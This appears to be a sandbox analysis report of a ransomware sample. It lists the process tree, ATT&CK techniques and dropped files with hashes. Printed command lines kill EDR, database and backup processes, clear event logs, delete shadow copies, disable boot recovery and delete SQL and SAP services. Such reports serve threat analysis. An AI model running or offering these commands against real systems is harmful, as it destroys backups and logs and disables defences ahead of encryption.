- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color e & @taskkill /IM VBoxSDS.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM TeamViewer_Service.exe /F & @taskkill /IM TeamViewer.exe /F & @taskkill /IM CasLicenceServer.exe /F & @taskkill /IM tv_w32.exe /F & @taskkill /IM tv_x64.exe /F & @taskkill /IM rdm.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM SecureCRTPortable.exe /F & @taskkill /IM VirtualBox.exe /F & @taskkill /IM VBoxSVC.exe /F & @taskkill /IM VirtualBoxVM.exe /F & @taskkill /IM abs_deployer.exe /F & @taskkill /IM edr_monitor.exe /F & @taskkill /IM sfupdatemgr.exe /F & @taskkill /IM ipc_proxy.exe /F & @taskkill /IM edr_agent.exe /F & @taskkill /IM edr_sec_plan.exe /F & @taskkill /IM sfavsvc.exe /F & @taskkill /IM DataShareBox.ShareBoxMonitorService.exe /F & @taskkill /IM DataShareBox.ShareBoxService.exe /F & @taskkill /IM Jointsky.CloudExchangeService.exe /F & @taskkill /IM Jointsky.CloudExchange.NodeService.ein /F & @taskkill /IM perl.exe /F & @taskkill /IM java.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM TsServer.exe /F & @taskkill /IM AppMain.exe /F & @taskkill /IM easservice.exe /F & @taskkill /IM Kingdee6.1.exe /F & @taskkill /IM QyKernel.exe /F & @taskkill /IM QyFragment.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM ComputerZTray.exe /F & @taskkill /IM ComputerZService.exe /F & @taskkill /IM ClearCache.exe /F & @taskkill /IM ProLiantMonitor.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM bugreport.exe /F & @taskkill /IM GNWebServer.exe /F & @taskkill /IM UI0Detect.exe /F & @taskkill /IM GNCore.exe /F & @taskkill /IM gnwayDDNS.exe /F & @taskkill /IM GNWebHelper.exe /F & @taskkill /IM php-cgi.exe /F & @taskkill /IM ESLUSBService.exe /F & @taskkill /IM CQA.exe /F & @taskkill /IM Kekcoek.pif /F & @taskkill /IM Tinuknx.exe /F & @taskkill /IM servers.exe /F & @taskkill /IM ping.exe /F & @taskkill /IM TianHeng.exe /F & @taskkill /IM K3MobileService.exe /F & @taskkill /IM VSSVC.exe /F & @taskkill /IM Xshell.exe /F & @taskkill /IM XshellCore.exe /F & @taskkill /IM FNPLicensingService.exe /F & @taskkill /IM XYNTService.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM EISService.exe /F & @taskkill /IM UFSoft.U8.Framework.EncryptManager.exe /F & @taskkill /IM yonyou.u8.gc.taskmanager.servicebus.exe /F & @taskkill /IM U8KeyManagePool.exe /F & @taskkill /IM U8MPool.exe /F & @taskkill /IM U8SCMPool.exe /F & @taskkill /IM UFIDA.U8.Report.SLReportService.exe /F & @taskkill /IM U8TaskService.exe /F & @taskkill /IM U8TaskWorker.exe /F & @taskkill /IM U8WebPool.exe /F & @taskkill /IM U8AllAuthServer.exe /F & @taskkill /IM UFIDA.U8.UAP.ReportService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.Services.exe /F & @taskkill /IM U8WorkerService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.exe /F & @taskkill /IM ShellStub.exe /F & @taskkill /IM U8UpLoadTask.exe /F & @taskkill /IM UfSysHostingService.exe /F & @taskkill /IM UFIDA.UBF.SystemManage.ApplicationService.exe /F & @taskkill /IM UFIDA.U9.CS.Collaboration.MailService.exe /F & @taskkill /IM NotificationService.exe /F & @taskkill /IM UBFdevenv.exe /F & @taskkill /IM UFIDA.U9.SystemManage.SystemManagerClient.exe /F & @taskkill /IM mongod.exe /F & @taskkill /IM SpusCss.exe /F & @taskkill /IM UUDesktop.exe /F & @taskkill /IM KDHRServices.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.Mobile.Servics.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM KDSvrMgrService.exe /F & @taskkill /IM pdfServer.exe /F & @taskkill /IM pdfspeedup.exe /F & @taskkill /IM SufAppServer.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.K3.Mobile.LightPushService.exe /F & @taskkill /IM iMTSSvcMgr.exe /F & @taskkill /IM kdmain.exe /F & @taskkill /IM KDActMGr.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM K3ServiceUpdater.exe /F & @taskkill /IM Aua.exe /F & @taskkill /IM iNethinkSQLBackup.exe /F & @taskkill /IM auaJW.exe /F & @taskkill /IM Scheduler.exe /F & @taskkill /IM bschJW.exe /F & @taskkill /IM SystemTray64.exe /F & @taskkill /IM OfficeDaemon.exe /F & @taskkill /IM OfficeIndex.exe /F & @taskkill /IM OfficeIm.exe /F & @taskkill /IM iNethinkSQLBackupConsole.exe /F & @taskkill /IM OfficeMail.exe /F & @taskkill /IM OfficeTask.exe /F & @taskkill /IM OfficePOP3.exe /F & @taskkill /IM apache.exe /F & @taskkill /IM GnHostService.exe /F /T & @taskkill /IM HwUVPUpgrade.exe /F /T & @taskkill /IM "Kingdee.KIS.UESystemSer.exe" /F /T & @taskkill /IM uvpmonitor.exe /F /T & @taskkill /IM UVPUpgradeService.exe /F /T & @taskkill /IM KDdataUpdate.exe /F /T & @taskkill /IM Portal.exe /F /T & @taskkill /IM U8SMSSrv.exe /F /T & @taskkill /IM "Ufida.T.SM.PublishService.exe" /F /T & @taskkill /IM lta8.exe /F /T & @taskkill /IM UfSvrMgr.exe /F /T & @taskkill /IM AutoUpdateService.exe /F /T & @taskkill /IM MOM.exe /F /T"
    3⤵
    PID:3232
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM VBoxSDS.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1432
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM mysqld.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1536
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TeamViewer_Service.exe /F
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2320
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TeamViewer.exe /F
      4⤵
      PID:1548
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM CasLicenceServer.exe /F
      4⤵
      PID:4496
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM tv_w32.exe /F
      4⤵
      PID:1432
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM tv_x64.exe /F
      4⤵
      PID:3504
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM rdm.exe /F
      4⤵
      PID:1532
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SecureCRT.exe /F
      4⤵
      PID:4952
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SecureCRTPortable.exe /F
      4⤵
      PID:3340
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM VirtualBox.exe /F
      4⤵
      PID:3076
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM VBoxSVC.exe /F
      4⤵
      PID:1868
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM VirtualBoxVM.exe /F
      4⤵
      PID:1604
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM abs_deployer.exe /F
      4⤵
      PID:1432
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM edr_monitor.exe /F
      4⤵
      PID:4316
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM sfupdatemgr.exe /F
      4⤵
      PID:4036
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ipc_proxy.exe /F
      4⤵
      PID:4784
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM edr_agent.exe /F
      4⤵
      PID:4028
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM edr_sec_plan.exe /F
      4⤵
      PID:4908
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM sfavsvc.exe /F
      4⤵
      Kills process with taskkill
      PID:1080
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM DataShareBox.ShareBoxMonitorService.exe /F
      4⤵
      PID:4608
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM DataShareBox.ShareBoxService.exe /F
      4⤵
      PID:4792
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Jointsky.CloudExchangeService.exe /F
      4⤵
      PID:1664
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Jointsky.CloudExchange.NodeService.ein /F
      4⤵
      PID:4220
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM perl.exe /F
      4⤵
      PID:3572
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WEVTUTIL EL
    3⤵
    PID:4788
  - - C:\Windows\SysWOW64\wevtutil.exe
      WEVTUTIL EL
      4⤵
      PID:3996
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "AMSI/Debug"
    3⤵
    PID:2180
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "AirSpaceChannel"
    3⤵
    PID:1092
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Analytic"
    3⤵
    PID:384
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Application"
    3⤵
    PID:1648
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "DirectShowFilterGraph"
    3⤵
    PID:2384
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "DirectShowPluginControl"
    3⤵
    PID:3940
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Els_Hyphenation/Analytic"
    3⤵
    PID:5096
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "EndpointMapper"
    3⤵
    PID:2168
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "FirstUXPerf-Analytic"
    3⤵
    PID:4728
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "ForwardedEvents"
    3⤵
    PID:4196
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "General Logging"
    3⤵
    PID:892
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "HardwareEvents"
    3⤵
    PID:2296
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "IHM_DebugChannel"
    3⤵
    PID:4484
- - C:\Windows\SysWOW64\wevtutil.exe
    WEVTUTIL CL "Intel-iaLPSS-GPIO/Analytic"
    3⤵
    PID:3076
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
  2⤵
  - Modifies extensions of user files
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:492
- - C:\Windows\system32\vssadmin.exe
    "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:4072
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
    3⤵
    PID:2692
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C sc delete MsDtsServer100&&sc delete MSSQL$SOPHOS&&sc delete MSSQLFDLauncher&&sc delete MSSQLSERVER&&sc delete MSSQLServerADHelper100&&sc delete MSSQLServerOLAPService&&sc delete ReportServer&&sc delete SQLAgent$SOPHOS&&sc delete "SQLANYs_sem5"&&sc delete SQLBrowser&&sc delete SQLSERVERAGENT&&sc delete SQLWriter&&sc delete B1LicenseService&&sc delete b1s50000&&sc delete b1s50001&&sc delete b1s50002&&sc delete B1ServerTools&&sc delete B1ServerTools64&&sc delete B1Workflow&&sc delete COMSysApp&&sc delete Gatekeeper64&&sc delete isapnp&&sc delete "SAP Business One RSP Agent Service"&&sc delete SBOClientAgent&&sc delete "SBODI_Server"&&sc delete SBOMail&&sc delete SBOWFDataAccess&&taskkill /f /im db*&&taskkill /f /im apache*&&taskkill /f /im mysql*&&taskkill /f /im Notifier*&&taskkill /f /im IBM*&&taskkill /f /im copy*&&taskkill /f /im store*&&taskkill /f /im sql*&&taskkill /f /im vee*&&taskkill /f /im wrsa*&&taskkill /f /im postg*&&taskkill /f /im sage*&&taskkill /f /im msdt*&&taskkill /f /im ora*&&taskkill /f /im microsoft*&&taskkill /f /im backup*&&taskkill /f /im http*&&taskkill /f /im office*&&taskkill /f /im cube*&&taskkill /f /im team*&&taskkill /f /im b1*&&taskkill /f /im sbo*&&taskkill /f /im reporting*&&taskkill /f /im sav*&&taskkill /f /im fd*&&taskkill /f /im microsoft*&&net stop MSSQLFDLauncher&&net stop MSSQLServerOLAPService&&net stop ReportServer
    3⤵
    PID:3012
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MsDtsServer100
      4⤵
      Launches sc.exe
      PID:1576
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
    3⤵
    PID:4996

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:520

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:3480

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Indicator Removal on Host

T1070

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\$RECYCLE.BIN\RECOVE~1.TXT

Filesize
964B

MD5
0aa64eadda6b207430803bf932a2ddd9

SHA1
609151f1d00d8584e40c4cb62752d1f8f168f9d0

SHA256
c070609a99764fe236924d0f1e1262779219759811fd968f1e31733503a41572

SHA512
96b0ed55030932ab409595a7c5e64e24fb6f44fb0ebade5aa379c11f897b845db0aadfa0178e77419e84f094cd6cbbfe65dc249274e5b6874e4c18e8dfa6b5d6

Download Submit
C:\$RECYCLE.BIN\S-1-5-~1\RECOVE~1.TXT

Filesize
964B

MD5
0aa64eadda6b207430803bf932a2ddd9

SHA1
609151f1d00d8584e40c4cb62752d1f8f168f9d0

SHA256
c070609a99764fe236924d0f1e1262779219759811fd968f1e31733503a41572

SHA512
96b0ed55030932ab409595a7c5e64e24fb6f44fb0ebade5aa379c11f897b845db0aadfa0178e77419e84f094cd6cbbfe65dc249274e5b6874e4c18e8dfa6b5d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ipwxaakoidjaugulptjnbcgkill$-arab.bat

Filesize
53KB

MD5
b57545cb36ef6a19fdde4b2208ebb225

SHA1
1d319740835ff12562e04cc74545a047bba63031

SHA256
445d709ea4ae38706a0cc47ffc6c100fb9a354ff1ac718d0c23415524bdfc895

SHA512
3618bb17282d8d82ff280590563eebd5c0b181d24156f6a69cba53d17a1bae0d9287c9f191efbe6c3d4223bcb47348c74177000aa0844263ed176df56e1f0856

Download Submit
C:\Users\Admin\Desktop\RECOVERY FILES.txt

Filesize
964B

MD5
0aa64eadda6b207430803bf932a2ddd9

SHA1
609151f1d00d8584e40c4cb62752d1f8f168f9d0

SHA256
c070609a99764fe236924d0f1e1262779219759811fd968f1e31733503a41572

SHA512
96b0ed55030932ab409595a7c5e64e24fb6f44fb0ebade5aa379c11f897b845db0aadfa0178e77419e84f094cd6cbbfe65dc249274e5b6874e4c18e8dfa6b5d6

Download Submit
memory/492-155-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/492-204-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/492-186-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/492-203-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/492-168-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/492-156-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/4912-132-0x00000000004D0000-0x00000000004D8000-memory.dmp

Filesize
32KB

Download
memory/4912-133-0x0000000006960000-0x0000000006982000-memory.dmp

Filesize
136KB

Download